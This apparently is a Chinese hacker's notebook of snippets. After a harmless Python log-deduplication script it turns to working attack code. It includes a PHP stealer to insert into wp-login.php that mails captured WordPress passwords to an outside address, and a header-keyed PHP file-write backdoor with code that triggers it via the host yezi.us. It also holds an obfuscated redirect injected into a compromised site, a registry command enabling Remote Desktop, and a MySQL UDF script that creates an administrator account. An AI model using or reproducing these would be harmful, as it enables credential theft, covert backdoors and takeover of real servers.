#coding: utf-8
import re, time

def calTime(func):
    def wrapper():
        start = time.time()
        func()
        end = time.time()
        print end - start
    return wrapper

@calTime
def sumAll():
    pattern = re.compile(u'/home/shopping/public_html/(.*)', re.I | re.S)
    f = open('new_log.txt', 'w')
    repeat = [];
    for line in open('error_log.log'):
            match = pattern.search(line)
            if match:
                repeat.append(match.group(0))
    no_repeat = set(repeat)
    for line in no_repeat:
        f.write(line)

sumAll()

鸡肋，可配合IIS解析漏洞Getshell.

伪造referer,上传回显。

链接

在wp-login.php

if ( ( empty( $redirect_to ) || $redirect_to == 'wp-admin/' || $redirect_to == admin_url() ) ) {

加入如下代码

date_default_timezone_set('Asia/Shanghai');
$ip = $_SERVER['REMOTE_ADDR'];
$to='xxoo@gmail.com';
$url =  "http://".$_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$subject='Success get wordpress password From : '.$_SERVER ['HTTP_HOST'];
$body="\n-------IP= ".$ip."\n-------Time = " .date("Y-m-d H:i:s").
"\n-------Path = ".$url."\n-------Name = ".trim(@$_POST['log']).
"\n-------Pass = ".trim(@$_POST['pwd']).
"\n----------------------------------------------";
$headers= 'MIME-Version: 1.0' . "\r\n";
$headers.= 'Content-type: text/html; charset=utf-8' . "\r\n";
$headers.="Here Comes The Wp Password";
$sendmail = @mail($to, $subject, $body, $headers);
if (!$sendmail){
	$file = fopen('wp_log.php' , 'a+');
	fwrite($file,$body);
	fclose($file);
}
扒了苍老师偷偷改了下。

一机油所在的外贸公司网站被日，发现如下代码(掉牙了的)

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};
if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};
c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 0=4.0;
3(0==2){0=4.8};3(0!=2&&0.6(\'5\')<=-1){9.a=\'i\'+\'j:/\'+\'/g\'+\'f.b\'+\'d\'+\'e.c\'+\'h/\'}',20,20,'language||null|if|navigator|zh|indexOf|var|browserLanguage|location|href|he||rvele|geu|w|ww|om|ht|tp'.split('|'),0,{}))

解密就简单了

把 eval 换成document.write

输出源代码

var language=navigator.language;if(language==null){language=navigator.browserLanguage};if(language!=null&&language.indexOf('zh')<=-1){location.href='ht'+'tp:/'+'/ww'+'w.he'+'rvele'+'geu.c'+'om/'}

目标网站：

http://www.hervelegeu.com

服务器都被日了，貌似留了个T00LS的 SETHC的后门，驱动级的。
估计就是那帮人了。
上百个网站，悲剧了！

http://hackertarget.com

挺给力的网站。

后门代码为：

if(crypt($_SERVER['HTTP_H0ST'],57)=='575BfMVM4wf0s'){@file_put_contents($_SERVER['HTTP_X'],$_SERVER['HTTP_Y']);header("Location: ./".$_SERVER['HTTP_X']);};

利用代码为：

$fp = fsockopen("yezi.us",80,$errno,$errstr,5);
if (!$fp){
echo('fp fail');
}
$out = "GET /1.php HTTP/1.1\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= "User-Agent: MSIE\r\n";
$out .= "Host: yezi.us\r\n";
$out .= "H0ST: toby57ha\r\n";
$out .= "X: ../sb.php \r\n";
$out .= "Y: \r\n";
$out .= "Connection: close\r\n\r\n";
fwrite($fp,$out);
while(!feof($fp)){
$resp_str .= fgets($fp,512);//返回值放入$resp_str
}
fclose($fp);
echo($resp_str);//处理返回值.

xxoo.exe "reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >nul"

MARK下，老翻不到。。。

xxoo.sql
Use mysql;
Select locad_file("d:\\wwwroot\\test\\udf.dll")  into dumpfile 'd:\\mysql 5.1\\lib\\plugin\\xxoo.dll' ;
//如果是LPK.DLL劫持之类的下面就可以无视了
create function cmdshell returns string soname 'xxoo.dll';
select cmdshell('net user xxoo xxoo /add&net localgroup administrators xxoo /add');
drop function cmdshell;
然后上传 mysql.exe 执行：
Mysql -uroot -ppass < d:\\wwwroot\\test\\xxoo.sql